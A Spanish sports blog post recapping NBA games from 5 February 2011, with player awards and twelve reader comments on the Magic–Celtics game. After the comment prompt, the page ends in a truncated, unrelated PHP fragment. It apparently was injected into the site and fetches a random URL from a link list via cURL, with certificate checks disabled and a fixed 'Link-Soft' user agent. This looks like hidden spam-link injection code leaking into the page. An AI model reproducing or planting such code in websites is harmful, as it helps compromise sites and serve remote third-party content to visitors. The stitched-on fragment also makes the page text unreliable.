La Crónica (05/02/2011)

06 de February de 2011 por txusma

No parecía una jornada excesivamente apasionante, pero al final nos ofrecieron actuaciones de gran calidad.

Los Lakers mostraron su mejor versión en New Orleans. Con Pau y Kobe, por primera vez en bastante tiempo, actuando como la extraordinaria pareja que son. Los Hornets en un excelente estado de forma a pesar de no contar con Okafor, aguantaron hasta casi el final apuntalados en una mejor segunda unidad, con Thornton, David Andersen y también DJ Mbenga haciéndolo bien frente a sus excompañeros.

Los Mavs están dulces y ayer ganaron sólidos en Charlotte. Denver hizo lo propio contra Minnesotta y los Thunder se mostraron demoledores en Salt Lake a pesar de la impresionante actuación de Millsap. Los Jazz no pudieron hacer frente al bombardeo exterior de Oklahoma. 13 de 21 desde la línea de tres.

En la otra conferencia saltó la sorpresa y en uno de esos partidos que les salen de vez en cuando los Warriors se la liaron a los Bulls, rompiendo su buena racha de victorias. Rose no tuvo su noche y Monta&Curry volvieron locos a sus pares. Los Hawks sí sacaron adelante su partido en la capital.

Como últimamente la mayor emoción de la liga la encontramos en la zona final de postemporada. Los Grizzlies vieron frenadas sus aspiraciones en un choque con prórroga en el Toyota Center de Houston. Hayes y Scola aguantaron bien a Marc y Randolph, mientras Kevin Martin sacó petróleo de las faltas que provocó. Los Blazers recuperaron la 8ª plaza con su victoria en Cleveland. Los Cavs, al menos, opusieron bastante resistencia.

Finalmente Rip Hamilton volvió a contar con minutos en la victoria de Detroit sobre unos renqueantes Bucks.

PREMIOS

MVP: Cuesta decidir este año quién es la estrella de Durant y es que Russell Westbrook está a un nivel altísimo. Ayer les clavó 33 puntos a los Jazz (10 de 15) repartiendo además 10 asistencias. Otro que pasó de la treintena de puntos fue Pau Gasol (13 de 17) que además rubricó su actuación con 10 rebotes y 3 asistencias.

Rookie: John Wall está eclipsado por Blake Griffin pero es también realmente bueno como demuestran los 18 puntos (8 de 13), 6 rebotes y 6 asistencias de anoche.

Sorpresa: Nicolas Batum aprovechó que los Blazers jugaban con la cenicienta de la liga para exhibirse. 21 puntos y 7 rebotes para un jugador muy interesante a largo plazo.

Decepción: A Michel Conley el aro se le hizo pequeño, pequeño. Tanto que sólo fue capaz de anotar 2 canastas de 16 intentos…

Esfuerzo en vano: Preguntábamos hace poco dónde andaba el Paul Millsap de las primeras jornadas. Anoche reapareció a lo grande con 34 puntos (15 de 20), 10 rebotes y 6 asistencias. Toda una exhibición que no obtuvo premio.

Imágenes | AP Photos / Getty Images

Comenta

12 comentarios a esta entrada

  1. Jona dice:
    #1

    A Rose lo que le paso ayer es que se encontró con un jugador tan rápido como él, y se vio que defensivamente Ellis está por encima

      Citar

  2. Albertis dice:
    #2

    UUUUU, vaya vacilada de Gasol al final del tercer cuarto!!!! 4 amagos le hace el tío, jojojo

      Citar

  3. Busky23 dice:
    #3

    Antes de que se me olvide quiero felicitar a los Cavs,que a pulso se han ganado ser el peor equipo de la historia.
    Han batido un récord y eso no todos los equipos pueden decirlo.

      Citar

  4. Denise dice:
    #4

    Estoy viendo el Boston – Orlando (46-43 al descanso). Y soy pesimista.
    Si no fuera por Superman podriamos ir perdiendo de 15 perfectamente. Vaya partidazo el que se está marcando Superman (22-6 al descanso), del resto de Orlando solo Anderson y Clark (jugando mas de lo habitual por la lesion de Bass) están haciendo algo digno. Por el momento, el turco, Richardson, Arenas y Redick están desaparacidos. Por su parte, Boston jugando muy bien en equipo, con Rondo castigando una y otra vez a Nelson, y por ahora, afortunadamente Pierce y Allen no están muy finos de cara al aro, en el momento que despierten…Adios Magic.
    Ya me estoy viendo a Superman como el mayor esfuerzo en vano en la cronica de mañana.

      Citar

  5. HisRoyalAirness dice:
    #5

    Pues yo creo que uno de las posibles opciones que tiene Orlando es poner al Agent Zero de titular y darle minutos. Un tío que estaba jugando a un nivel muy bueno en Wizards no puede jugar 20 minutos. Y menos si le pagas lo que le estás pagando.

      Citar

  6. HisRoyalAirness dice:
    #6

    Quería decir que yo tambien estoy viendo el partido jeje.

      Citar

  7. Denise dice:
    #7

    Pero si es que Arenas está haciendo un partido desastroso, lleva un 0-7 y está cargado de faltas. Rondo nos está haciendo un traje, y Howard naturalmente ya no está haciendo el daño que ha hecho en la primera mitad. Para colmo, a Allen le han empezado a entrar los tiros y a Pierce solo podemos pararlo mandandolo a la linea de tiros libres.
    Concusión: Vamos a perder.

      Citar

  8. Denise dice:
    #8

    No hacía falta ser un sabio para saber al descanso que ibamos a palmar. Howard ha sido totalmente anulado en la 2º parte (que crack Doc Rivers), y jugar con el turco, Arenas y Redick es como jugar a la ruleta rusa. Richardson metió algunos puntos cuando ya no servian para nada. Total, que verguenza que Howard esté completamente solo con la de “supuesta” calidad que tienen los jugadores que le rodean.
    Unos Celtics bien plantados en defensa, con Rondo en plan estrella y con su Big Three sin brillar pero cumpliendo nos ha tumbado.
    Estos Magic no tienen nada que hacer este año. Pasar la 1era ronda e intentar que los Heat o los Celtics nos humillen lo menos posible.

      Citar

  9. arvydas dice:
    #9

    ganen o pierdan griffin siempre rellena estadistica

      Citar

  10. Jerjes el inmortal dice:
    #10

    Me parece que lo único decente que podrían hacer los Magic´s es traspasar a SVG o a DH, creo que el Heat o los Celtas, le darían una calurosa y fervorosa bienvenida, obviamente hablo de DH, por que SVG nació para ser segundo…………

    o tercero…. o cuarto del Este…

      Citar

  11. Len Bias dice:
    #11

    Como no espabilen los Magic, les va a pasar con Howard lo mismo que con O’Neal…
    En Orlando ya se comenta que acaba contrato en 2012

      Citar

  12. HisRoyalAirness dice:
    #12

    Yo creo que tienen que apostar por un quinteto que no se limite sólo al tiro exterior. Que le dejen libertad a Gilbert para tirar o penetrar (con Howard abriendo hueco no es muy difícil) y abusar un poco del pick & roll con DH. Tienen que ser los 2 hombres clave junto al turco y J Rich.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>